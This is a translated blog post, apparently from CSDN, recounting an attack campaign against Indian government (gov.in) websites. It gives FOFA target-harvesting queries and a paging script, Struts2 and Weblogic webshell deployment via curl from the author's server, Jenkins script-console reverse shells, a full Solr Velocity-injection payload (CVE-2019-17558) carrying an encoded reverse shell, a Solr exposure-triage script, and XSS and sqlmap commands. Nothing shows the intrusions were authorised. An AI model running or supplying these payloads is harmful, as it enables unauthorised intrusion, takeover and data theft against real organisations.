A fully exposed Red Hat penetration test [getshell]

0x01. Information gathering stage

Note: information gathering in this engagement relied mainly on the FOFA cyberspace search platform, https://fofa.info/

At the start I did not have a clear plan, so I simply ran a broad collection of every "gov.in" host:

host="gov.in" && country="IN"

68,465 results. That looks like a good haul, but there is a problem: how to download them all locally? Even an advanced-member API key can only fetch 10,000 records per call.

I tried a quick script:

import pythonfofa
import csv

filename = "IN_domain.csv"

email = 'u_mail'
key = 'u_API_KEY'
search = pythonfofa.Client(email, key)
# size=70000 is far above the 10,000-per-call cap, so this is the call that fails
get_data = search.search('host="gov.in" && country="IN"', size=70000)
# print(get_data)

requests = [result[1] for result in get_data['results']]
print(requests)
# Open the CSV file in write mode
with open(filename, "w", newline="") as file:
    writer = csv.writer(file)

    # Iterate over the request list
    for request in requests:
        # Print the domain to the console
        print(request)

        # Check whether the domain already carries a scheme
        if not request.startswith("http://") and not request.startswith("https://"):
            # If not, prefix it with "http://"
            request = "http://" + request

        # Append a trailing slash "/"
        request += "/"

        # Write the request and the value "1" as one CSV row
        writer.writerow([request, 1])

As expected, it does not run. Setting a breakpoint and stepping through shows why.

Confirmed: 70,000 records cannot be pulled in a single call. So I changed the collection strategy: gather hosts running mainstream frameworks and run the matching vulnerability scans against each group.
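The 10,000-record ceiling is a per-request limit: the FOFA v1 search API takes page and size parameters, so a result set of this size can still be pulled down by paging. The script below is an added example, not the post's script and not FOFA's client library; it calls the public REST endpoint directly with urllib, treats the 10,000 cap and the response layout ("error", "errmsg", "size", "results") as assumptions about the API, and keeps the transport pluggable so the paging logic can be exercised offline against constructed pages.

```python
import base64
import csv
import json
import urllib.parse
import urllib.request

# FOFA's documented v1 search endpoint; the 10,000-per-call cap is the figure from the post.
FOFA_SEARCH_URL = "https://fofa.info/api/v1/search/all"
MAX_PAGE_SIZE = 10000


def build_search_url(email, key, query, page, size=MAX_PAGE_SIZE, fields="host,ip,port"):
    """Build the request for one page. FOFA takes the query base64-encoded as qbase64."""
    params = {
        "email": email,
        "key": key,
        "qbase64": base64.b64encode(query.encode("utf-8")).decode("ascii"),
        "fields": fields,
        "page": page,
        "size": min(size, MAX_PAGE_SIZE),   # never ask for more than the cap
    }
    return FOFA_SEARCH_URL + "?" + urllib.parse.urlencode(params)


def fetch_json(url):
    """Default transport: one GET, parsed as JSON (only used on a real run)."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.loads(resp.read().decode("utf-8"))


def collect_hosts(email, key, query, fetch=fetch_json, size=MAX_PAGE_SIZE, limit=None):
    """Walk the result set page by page until every match has been seen.

    Assumed response shape: {"error": bool, "errmsg": str, "size": total_matches,
    "results": [[host, ip, port], ...]}. Hosts are de-duplicated because a host
    listening on several ports comes back once per port.
    """
    hosts, seen, fetched, page = [], set(), 0, 1
    while True:
        data = fetch(build_search_url(email, key, query, page, size))
        if data.get("error"):
            raise RuntimeError("FOFA error: %s" % data.get("errmsg", "unknown"))
        rows = data.get("results") or []
        for row in rows:
            host = row[0]          # column 0 is host because fields starts with "host"
            if host not in seen:
                seen.add(host)
                hosts.append(host)
        fetched += len(rows)
        total = int(data.get("size", 0))
        if not rows or fetched >= total or (limit and len(hosts) >= limit):
            break
        page += 1
    return hosts[:limit] if limit else hosts


def to_url(host):
    """Normalise a FOFA host value into scheme://host/ for a scanner target list."""
    if not host.startswith(("http://", "https://")):
        host = "http://" + host
    return host if host.endswith("/") else host + "/"


def write_targets(filename, hosts):
    """Write one target per row, keeping the constant '1' column the post's CSV used."""
    with open(filename, "w", newline="") as fh:
        writer = csv.writer(fh)
        for host in hosts:
            writer.writerow([to_url(host), 1])
    return len(hosts)


if __name__ == "__main__":
    # Real run (needs an advanced-member key): python fofa_pages.py EMAIL KEY
    import sys
    found = collect_hosts(sys.argv[1], sys.argv[2], 'host="gov.in" && country="IN"')
    print("wrote", write_targets("IN_domain.csv", found), "targets")
```

Paging stops when the running row count reaches the total FOFA reports, so a query that grows while you are paging is simply picked up on the next run; pass limit to stop early when you only want a sample.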

FOFA queries for the mainstream frameworks with known vulnerabilities:

Fastjson

app="Fastjson" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")

Struts2

app="Struts" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")

Log4j2

(app="Log4j2" && host="in" && country="IN" && status_code="200" && (port="80" || port="443"))

Other frameworks follow the same pattern.

With the targets collected, on to vulnerability detection.


0x02. Vulnerability detection and exploitation

Struts2:

I pointed AWVS (Acunetix) at the collected hosts for batch vulnerability scanning:

Results came in quickly on the first day. Since the goal this time is getshell, I ignored the medium- and low-risk findings and looked only at the high-risk ones:

A nice batch of Struts2 vulnerabilities. Straight to the exploitation tool:

This gives RCE (remote command execution). To drop a webshell remotely, first generate an AntSword JSP shell with the tool:

Host the shell on a public server, then run a command on the target to find the web root: /var/tomcat9/pmrportal/ROOT/

Then execute on the target:

curl -o /var/tomcat9/pmrportal/ROOT/shell.jsp http://u_ip/antsword.jsp

AntSword can then connect to the webshell:

Several other hosts exposed S2-045 as well. The getshell method is the same as above, so I will not repeat it.

Weblogic:

AWVS proved useful again. The exploitation tool injects an in-memory webshell (内存马) directly:

Behinder (冰蝎, "Ice Scorpion") connects to the webshell:

Several more of the same type turned up; the getshell method is identical, so I will not go through them one by one.

(PS: by this point I was already somewhat worn out and did not get around to manually testing the upload points.)

Jenkins:

When the other frameworks yielded nothing, I went browsing and came across Jenkins, which has a long list of unauthenticated-access plus RCE cases. Straight to FOFA:

(app="JENKINS" && title=="Dashboard [Jenkins]" && country="IN" && status_code="200") && (port="80" || port="443")

86 assets: promising, and few enough to test by hand:

Unauthenticated access works. Go to Manage Jenkins --> Script Console and test command execution:

println "ls -al".execute().text

Command execution confirmed. Try a reverse shell:

println "bash -i >& /dev/tcp/ip/port 0<&1".execute().text

Start a listener on the server that will receive the shell:

Execute the command:

No shell came back. The reason is not that a reverse shell cannot be run from the web side: Groovy's String.execute() splits the string on whitespace and launches the process directly through ProcessBuilder, so no shell ever parses it, and ">&", "/dev/tcp/ip/port" and "0<&1" reach bash as literal arguments rather than as redirections. Writing the reverse shell command into a .sh file and executing that file sidesteps the problem:

Put the following in the .sh file:

bash -i >& /dev/tcp/ip/port 0<&1

Serve it from a web server you control, then fetch it from the Jenkins host with curl:

println "curl -o /tmp/jenkins.sh http://u_ip:port/jenkins.sh".execute().text

Check that the .sh file arrived:

println "ls -al /tmp".execute().text

The file is there. Execute it to get the reverse shell.

Start the listener:

Run the .sh file:

println "bash /tmp/jenkins.sh".execute().text

The listener caught the shell: another one down. The remaining Jenkins instances required authentication, so I did not attempt them.

Apache-Solr

With time on my hands, I read through a few RCE reproductions and, on a whim, searched FOFA:

country="IN" && app="Apache-Solr" && status_code="200" && (port="443" || port="80")

Not many results. Testing by hand found three instances with unauthenticated admin access (no login required):

Requires authentication:

Unauthenticated access:

With unauthenticated access in hand, check for the known CVE:

Visit /solr/admin/cores/ to get the core name: name => music

Then request /solr/music/config/ to view the core's configuration:

Both Velocity resource-loader flags are true, so the publicly disclosed VelocityResponseWriter template-injection payload (CVE-2019-17558) gives RCE directly:

GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22whoami%22))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
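The two pre-checks above (read the core name from /solr/admin/cores, then confirm the Velocity writer's loader flags in /solr/<core>/config) can be automated before any payload goes out. The Python below is an added example, not the post's code and not a Solr client; the JSON layouts it parses ("status" keyed by core name, "config.queryResponseWriter.velocity" carrying the flags) and the sample responses are constructed from memory of the Solr admin API, so treat their shape as an assumption and compare with a real response (append wt=json) before relying on it. Only params.resource.loader.enabled governs whether a template supplied in v.template.custom is honoured; the solr.resource.loader.enabled flag is reported alongside because the post saw both set to true.

```python
import json

# Constructed sample responses (not captured from any target), shaped like
# /solr/admin/cores?wt=json and /solr/<core>/config?wt=json.
CORES_SAMPLE = json.dumps({
    "responseHeader": {"status": 0, "QTime": 1},
    "status": {
        "music": {"name": "music", "instanceDir": "/var/solr/data/music", "uptime": 12345},
        "films": {"name": "films", "instanceDir": "/var/solr/data/films", "uptime": 12345},
    },
})

# Writer configured the way the post's screenshot described: both loaders on.
CONFIG_EXPOSED = json.dumps({
    "config": {"queryResponseWriter": {
        "velocity": {
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true",
        }}}})

# Shipped default: templates from request parameters are disabled.
CONFIG_DEFAULT = json.dumps({
    "config": {"queryResponseWriter": {
        "velocity": {
            "class": "solr.VelocityResponseWriter",
            "params.resource.loader.enabled": "false",
        }}}})

PARAMS_FLAG = "params.resource.loader.enabled"
SOLR_FLAG = "solr.resource.loader.enabled"


def core_names(cores_json):
    """Core names listed by /solr/admin/cores (the post read `music` from here)."""
    return sorted(json.loads(cores_json).get("status", {}).keys())


def velocity_loader_flags(config_json):
    """Return {flag: bool} for the two loader flags; a missing writer or flag counts as false."""
    writers = json.loads(config_json).get("config", {}).get("queryResponseWriter", {})
    velocity = writers.get("velocity") or {}
    return {flag: str(velocity.get(flag, "false")).lower() == "true"
            for flag in (PARAMS_FLAG, SOLR_FLAG)}


def accepts_request_templates(config_json):
    """True when v.template.custom in the query string will be rendered, i.e. the
    params loader is on. This is the condition the payload in the post depends on."""
    return velocity_loader_flags(config_json)[PARAMS_FLAG]


def triage(cores_json, config_by_core):
    """Map every core to whether it should be considered exposed.

    config_by_core: {core_name: config_json}; cores with no fetched config are skipped.
    """
    return {core: accepts_request_templates(config_by_core[core])
            for core in core_names(cores_json) if core in config_by_core}


if __name__ == "__main__":
    print(triage(CORES_SAMPLE, {"music": CONFIG_EXPOSED, "films": CONFIG_DEFAULT}))
```

On a live target the two strings come from GET /solr/admin/cores?wt=json and GET /solr/<core>/config?wt=json; feeding those into triage() tells you which cores are worth the payload and which are not, without touching the writer at all.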

Test whether the host has outbound network access:

Change the executed command to:

curl%20xtolsc.dnslog.cn

It does reach out, so go straight for a reverse shell:

GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2xxxxxx8xMDEuNDMuMTM5LjI0My81MDAwIDA%2BJjE%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end  HTTP/1.1
Host: ip
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Start the listener on the VPS: nc -lvvnp 5000

The shell came back, and with root privileges: another one down.

Other vulnerabilities found

Reflected XSS

Nothing difficult here: no blacklist to bypass. Test payload:

<script>alert(1)</script>

SQL injection

No manual testing for these; once an injection point was found, straight to sqlmap:

sqlmap -u https://******.gov.in/****/Validate.jsp --data "[email protected]&password=123456" --random-agent --threads=10 -p password --proxy=http://127.0.0.1:7890 --dbms=mysql

Other vulnerabilities were found too, but they were not the focus of this engagement, so I did not dig deeper.

Penetration Summary

This test ran for a long time and the targets exposed many attack points; it was a very interesting engagement. The pity is that other commitments meant I could not give it my full attention toward the end.

Source: blog.csdn.net/qq_38154820/article/details/132201867